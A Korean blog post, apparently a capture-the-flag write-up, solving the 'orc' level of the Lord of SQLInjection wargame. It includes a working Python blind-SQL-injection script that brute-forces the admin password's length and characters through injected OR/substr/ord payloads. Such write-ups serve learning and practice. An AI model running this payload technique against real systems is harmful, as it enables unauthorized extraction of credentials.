Notice
Recent Posts
Recent Comments
Link
| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | 2 | 3 | 4 | 5 | ||
| 6 | 7 | 8 | 9 | 10 | 11 | 12 |
| 13 | 14 | 15 | 16 | 17 | 18 | 19 |
| 20 | 21 | 22 | 23 | 24 | 25 | 26 |
| 27 | 28 | 29 | 30 | 31 |
Tags
- 정보보안
- 활성화함수파이썬
- 딥러닝
- 딥러닝파이썬
- 알고리즘
- 보안
- 파이썬신경망
- 신경망
- 달고나bof
- 밑바닥부터시작하는딥러닝
- BOJ
- 인공지능
- 백준알고리즘
- 머신러닝
- C언어알고리즘
- 파이썬
- 백준
- 항등함수
- BOF
- c언어
- 신경망파이썬
- C알고리즘
- 버퍼오버플로우
- 스트림암호
- 소프트맥스함수
- C언어 알고리즘
- FTZlevel10
- 신경망 학습
- 8086CPU레지스터
- 신경망구현
Archives
- Today
- Total
HeeJ's
[04] orc :: Lord or SQLInjection 본문
이 orc 문제는 blindSQL 문제로,
전송한 쿼리의 리턴 값이 true인지 false인지의 반응을 통해
pw의 값을 알아보는 문제이다
이 문제를 풀기 위해 자동화 스크립트를 파이썬으로 작성해주었다.
import requests
#los orc
url = "Lord of SQL orc URL"
headers = {"Cookie":"PHPSESSID=Your PHPSESSID"}
#패스워드 길이 구하기
for i in range(50):
query="pw='||id='admin' and length(pw)={}%23".format(i)
r = requests.get(url+query, headers=headers)
if "Hello admin" in r.text:
length = i
break
#패스워드 구하기
pw=''
for i in range(1,length+1):
for j in range(33,127):
query = "pw='||id='admin' and ord(substr(pw,{},1))={}%23".format(i,j)
r = requests.get(url+query, headers=headers)
if "Hello admin" in r.text:
pw+=chr(j)
print("passwd is",pw)
break
이렇게 실행해주면
pw를 찾을 수 있다.
이 pw를 ?pw=찾은 pw값으로 넣어주게 되면
'<CTF> > <Lord of SQLInjection>' 카테고리의 다른 글
| [06] darkelf :: Lord of SQLInjection (0) | 2021.03.24 |
|---|---|
| [05] wolfman :: Lord of SQLInjection (0) | 2021.03.18 |
| [03] goblin :: Lord of SQLInjection (0) | 2021.01.16 |
| [02] cobolt :: Load of SQLInjection (0) | 2021.01.10 |
| [01] gremlin :: Lord or SQLInjection (0) | 2021.01.10 |
'<CTF>/<Lord of SQLInjection>' Related Articles
more
